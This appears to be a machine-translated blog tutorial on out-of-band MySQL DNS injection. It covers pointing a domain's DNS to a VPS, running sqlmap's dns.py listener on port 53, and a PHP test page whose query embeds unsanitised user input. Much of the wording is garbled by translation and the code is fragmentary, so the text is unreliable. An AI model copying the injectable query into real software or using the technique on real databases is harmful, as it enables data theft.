DNS injection is a DNS resolution request for a domain name through a database to achieve fast data acquisition purposes.
Principle:
Send a picture of yourself first
Usually in the presence of an injection point without data echo injection, we need to use delayed injection or blind (Boolean injection), this injection speed is very slow, need a word Fu Chai solution, and very easy to hang Web site, at this time how we quickly get data. Below I will explain in detail the MySQL DNS injection operation steps.
Things to prepare:
Domain 2, VPS one (loaded well sqlmap)
There's no such thing as Cloudeye, there's a free http://ceye.io/.
First came our first domain md5crack.cn modify the domain name DNS server
Here I changed domain DNS to my second domain name Test.itgou.club, and then the Test.itgou.club domain name resolution to their own VPS IP.
Then wait for DNS to take effect.
The local injection point (inject.php) is then tested with the following code:
2 |
$link = mysql_connect ("localhost", "root", "root"); |
3 |
mysql_select_db ("MySQL", $link); |
4 |
$sql = "Select password from user where user= ' {$_get[' user ']} '"; |
You can see that the injection point has no other way to get the data except for the deferred injection, but we have a DNS injection that doesn't need to be injected without delay.
Then come to SSH login to our VPS and go into Sqlmap's sqlmap/lib/request/directory
Here's a dns.py, what's this for, a script that listens to 53 ports (DNS ports) and uses him to get the data.
Then we run this script and listen for Port 53.
Access Injection point: http://localhost/inject.php?user=root